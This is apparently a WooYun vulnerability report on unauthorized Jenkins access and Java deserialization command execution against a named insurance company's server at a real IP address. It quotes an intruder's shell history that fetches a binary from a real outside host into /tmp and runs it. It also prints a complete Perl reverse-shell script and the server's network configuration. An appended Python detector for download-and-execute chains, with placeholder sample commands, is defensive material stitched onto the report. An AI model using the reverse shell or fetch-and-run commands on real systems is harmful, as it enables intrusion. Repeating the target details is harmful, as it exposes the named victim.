WooYun (WooYun.org) historical vulnerability lookup---http://wy.zone.ci/
WooYun Drops articles online--------http://drop.zone.ci/
2016-03-24: Details sent to the vendor, awaiting vendor handling
2016-03-24: Vendor confirmed; details disclosed to the vendor only
2016-04-03: Details disclosed to core white hats and relevant domain experts
2016-04-13: Details disclosed to regular white hats
2016-04-23: Details disclosed to intern white hats
2016-05-08: Details disclosed to the public
http://123.57.39.190 Jenkins project unauthorized access + Java deserialization command execution: http://123.57.39.190:8080/job/site
华夏保险 (Huaxia Insurance)
It looks like someone has already planted a backdoor on this system. cat /home/cms_int/.bash_history, last few lines:
ps ax
kill -s 9 26927
wget http://120.192.246.90:6546/2huizhen -P /tmp/;cd /tmp;chmod 777 2huizhen;./2huizhen
exit
http://120.192.246.90:6546/ hosts a few tools; everyone knows what they are.
weiwei.pl
#!/usr/bin/perl -w
# use strict;
use Socket;
use IO::Handle;
if($#ARGV+1 != 2){
    print "$#ARGV $0 Remote_IP Remote_Port \n";
    exit 1;
}
my $remote_ip = $ARGV[0];
my $remote_port = $ARGV[1];
my $proto = getprotobyname("tcp");
my $pack_addr = sockaddr_in($remote_port, inet_aton($remote_ip));
my $shell = '/bin/bash -i';
socket(SOCK, AF_INET, SOCK_STREAM, $proto);
STDOUT->autoflush(1);
SOCK->autoflush(1);
connect(SOCK,$pack_addr) or die "can not connect:$!";
open STDIN, "<&SOCK";
open STDOUT, ">&SOCK";
open STDERR, ">&SOCK";
print "Enjoy the shell.\n";
system($shell);
close SOCK;
exit 0;
ifconfig -a
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.173.5.9  netmask 255.255.248.0  broadcast 10.173.7.255
        ether 00:16:3e:00:68:5e  txqueuelen 1000  (Ethernet)
        RX packets 1433800840  bytes 67121663795 (62.5 GiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 11861782  bytes 5397221371 (5.0 GiB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 123.57.39.190  netmask 255.255.252.0  broadcast 123.57.39.255
        ether 00:16:3e:00:2e:53  txqueuelen 1000  (Ethernet)
        RX packets 7397850480  bytes 316003053060 (294.3 GiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 325398474883  bytes 170789798721155 (155.3 TiB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 0  (Local Loopback)
        RX packets 7195279  bytes 4137380599 (3.8 GiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 7195279  bytes 4137380599 (3.8 GiB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

That is all the proof I will give.
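The .bash_history lines quoted above (kill a process, fetch a binary into /tmp, chmod it executable, run it) are a textbook post-compromise artifact, and an incident responder usually wants to sweep every user's shell history on a suspect host for that same chain. The script below is an added example, not part of the original report or of any tool it mentions: it splits each history line into its chained commands and flags fetch-stage-execute sequences and curl-pipe-to-shell one-liners. The sample history, the IP 198.51.100.7, the port and the file name "payload" are constructed placeholders, not values from the report.

```python
import re
from dataclasses import dataclass, field
from typing import List

# Constructed sample of the last lines of a .bash_history, modelled on the
# kill / wget-to-/tmp / chmod / execute sequence shown in the report.
# The IP, port and file name are placeholders, not the ones from the report.
SAMPLE_HISTORY = """ps ax
kill -s 9 26927
wget http://198.51.100.7:6546/payload -P /tmp/;cd /tmp;chmod 777 payload;./payload
exit
ls -la /var/log
curl -s http://198.51.100.7/setup.sh | bash
"""

# World-writable directories where a downloaded binary is typically staged.
STAGING_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


@dataclass
class Finding:
    line_no: int
    line: str
    reasons: List[str] = field(default_factory=list)


def split_commands(line: str) -> List[str]:
    """Split one history line on ';', '&&', '||' and '|' into its commands."""
    parts = re.split(r"\s*(?:;|&&|\|\||\|)\s*", line)
    return [p for p in (s.strip() for s in parts) if p]


def analyse_line(line_no: int, line: str) -> Finding:
    """Flag a history line that shows a fetch / stage / execute chain."""
    cmds = split_commands(line)
    reasons: List[str] = []

    # A wget/curl of an http(s) URL anywhere in the chain.
    fetches = any(re.match(r"(wget|curl)\b", c) and "http" in c for c in cmds)
    # Anything touching a staging directory.
    staged = any(d in c for c in cmds for d in STAGING_DIRS)
    # chmod that sets an execute bit ("+x" or an odd octal digit).
    chmod_exec = False
    for c in cmds:
        m = re.match(r"chmod\s+(\+x|[0-7]{3,4})\s", c)
        if m:
            mode = m.group(1)
            chmod_exec = mode == "+x" or any(int(ch) & 1 for ch in mode)
    # Running a file from the current dir or a script from a staging dir.
    runs_local = any(
        re.match(r"\./\S+", c) or re.match(r"(sh|bash)\s+/(tmp|var/tmp|dev/shm)/", c)
        for c in cmds
    )

    if fetches and runs_local:
        reasons.append("download-and-execute chain")
    if fetches and staged:
        reasons.append("payload fetched into a world-writable staging dir")
    if chmod_exec and runs_local:
        reasons.append("chmod to executable followed by local execution")
    if re.search(r"\|\s*(ba)?sh\b", line):
        reasons.append("remote script piped to shell")
    return Finding(line_no, line, reasons)


def scan_history(text: str) -> List[Finding]:
    """Return only the history lines that triggered at least one reason."""
    findings = []
    for n, line in enumerate(text.splitlines(), start=1):
        f = analyse_line(n, line)
        if f.reasons:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f.line_no}: {f.line}")
        for r in f.reasons:
            print(f"    - {r}")
```

On a real host you would feed it each ~/.bash_history (and /root/.bash_history) found on disk image or live system; note that history is only written when the shell exits cleanly and is trivially cleared, so a clean history is not evidence of absence, which is why the ifconfig and process listing above matter as corroborating evidence.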
Jenkins Java deserialization command execution
Severity: Medium
Vulnerability Rank: 9
Confirmed: 2016-03-24 14:15
In progress
None yet